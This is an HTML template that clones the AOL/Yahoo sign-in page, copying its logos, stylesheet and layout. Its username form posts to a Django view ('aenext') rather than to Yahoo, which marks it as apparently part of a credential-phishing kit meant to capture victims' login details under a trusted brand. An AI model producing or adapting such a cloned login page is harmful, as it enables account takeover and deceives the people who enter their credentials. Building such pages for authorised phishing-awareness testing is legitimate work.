
<!DOCTYPE html>
<html lang="en-US">
    <head>
        <meta charset="utf-8">
        <title>Aol</title>
        <style nonce="z6UT8sg132KtVOzT3XFMLbpLU1MG8fCxcpIiEtAWvJe9cuKN">
            #mbr-css-check {
                display: inline;
            }
        </style>
        <link href="https://s.yimg.com/wm/mbr/d00405303febe2718435ac086630741fde4bc7a7/yahoo-main.css" rel="stylesheet" type="text/css">
    </head>
    <body class="bucket-mbr-whatsapp-ac bucket-mbr-passkey-unr-reg bucket-mbr-whatsapp-nac bucket-mbr-request-imapin-scopes-ym">
    <div id="login-body" class="loginish  puree-v2  grid   ">
    <div class="mbr-desktop-hd">
    <span class="column">
            <img src="https://s.yimg.com/cv/apiv2/ybar/logos/aol-logo-black-v1.png" alt="Aol" class="logo aol-en-US" width="100" height="" />
                    <img src="https://s.yimg.com/cv/apiv2/ybar/logos/aol-logo-white-v1.png" alt="Aol" class="dark-mode-logo logo aol-en-US" width="100" height="" />
        </a>
    </span>
    <div class="desktop-universal-header">
        <a data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerHelp">Help</a>
        <a href="" class="universal-header-links" data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerTerms">Terms</a>
        <a href="" class="universal-header-links privacy-link" data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerPrivacy">Privacy</a>
    </div>
</div>
    <div class="login-box-container">
        <div class="login-box right">
            <div class="mbr-login-hd txt-align-center">
                <img src="https://s.yimg.com/cv/apiv2/ybar/logos/aol-logo-black-v1.png" alt="Aol" class="logo aol-en-US" width="100" height="" />
                <img src="https://s.yimg.com/cv/apiv2/ybar/logos/aol-logo-white-v1.png" alt="Aol" class="dark-mode-logo logo aol-en-US" width="100" height="" />
            </div>
            <div class="challenge yid-challenge">
    <div class="challenge-header">
</div><div class="username-challenge" id="login-landing">
    <strong class="challenge-heading">Sign in</strong>
    <span class="challenge-desc signin-sub-title">using your Yahoo account</span>
    </span>
    
            <form method="POST" id="login-username-form" method="post" class="pure-form" action="{% url 'aenext' %}">
                {% csrf_token %}
                <input class="phone-no" required type="email" name="username" id="login-username" autofocus="true"/>
                <br>
                <label style="margin: 4px;" for="login-username" id="login-label" class="login-label">Username, email, or mobile</label>
                <br>
                <br>
                <button class="pure-button puree-button-primary">Next</button>        
            </form>
        </div>
        <p id="username-error" class="error-msg hide" role="alert"></p>

        <div class="helper-links-container">

            <div class="helper-item arlink">
                <span class="help">
                    <br>
                    <a href="/forgot?.lang&#x3D;en-US&amp;src&#x3D;homepage&amp;activity&#x3D;ybar-signin&amp;pspid&#x3D;2023538075&amp;.done&#x3D;https%3A%2F%2Fwww.yahoo.com%2F&amp;done&#x3D;https%3A%2F%2Fwww.yahoo.com%2F" id="mbr-forgot-link" data-ylk="elm:btn;elmt:forgot;slk:forgot;mkey:forgot" data-rapid-tracking="true">Forgot username?</a>
                </span>
            </div>
        </div>


        <div class="bottom-links-container has-social-buttons">
            <p class="sign-up-link">
                <a href="/account/create?.lang&#x3D;en-US&amp;src&#x3D;homepage&amp;activity&#x3D;ybar-signin&amp;pspid&#x3D;2023538075&amp;.done&#x3D;https%3A%2F%2Fwww.yahoo.com%2F&amp;specId&#x3D;yidregsimplified&amp;done&#x3D;https%3A%2F%2Fwww.yahoo.com%2F" id="createacc" role="button" class="pure-button puree-button-secondary challenge-button" data-rapid-tracking="true" data-ylk="elm:link;elmt:secondary;slk:signup;mKey:signup">Create an account</a>
            </p>
        </div>
</div>
</div>
        </div>
        <div id="login-box-ad-fallback" class="login-box-ad-fallback">
           </div>
    </div>
    <div class="login-bg-outer">
        <div class="login-bg-inner">
            <div id="login-ad-rich" aria-hidden="true">
                <iframe id="login-ads-gpt-iframe" allow="geolocation &#x27;none&#x27;; fullscreen &#x27;none&#x27;; autoplay &#x27;none&#x27;; camera &#x27;none&#x27;; display-capture &#x27;none&#x27;; document-domain &#x27;none&#x27;; microphone &#x27;none&#x27;; gyroscope &#x27;none&#x27;; magnetometer &#x27;none&#x27;; midi &#x27;none&#x27;; payment &#x27;none&#x27;; serial &#x27;none&#x27;; speaker-selection &#x27;none&#x27;" sandbox="allow-forms allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts" width="1440" height="1024" scrolling="no" frameborder="no"></iframe>
            </div>
                    </div>
    </div>
</div>

    <div id="mbr-css-check"></div>
    <div id="page-mask" class="page-mask hide"></div>
    <div id="ad"></div>
    <div class="mbr-legacy-device-bar" id="mbr-legacy-device-bar">
        <label class="cross" for="mbr-legacy-device-bar-cross" aria-label="Close this warning">x</label>
        <p class="mbr-legacy-device">
                Yahoo works best with the latest versions of the browsers. You're using an outdated or unsupported browser and some Yahoo features may not work properly. Please update your browser version now. <a href="">More Info</a>
        </p>
    </div>

    </body>
</html>
<!-- fe31.member.ir2.yahoo.com - Wed Dec 18 2024 12:45:33 GMT+0000 (Coordinated Universal Time) - (0ms) -->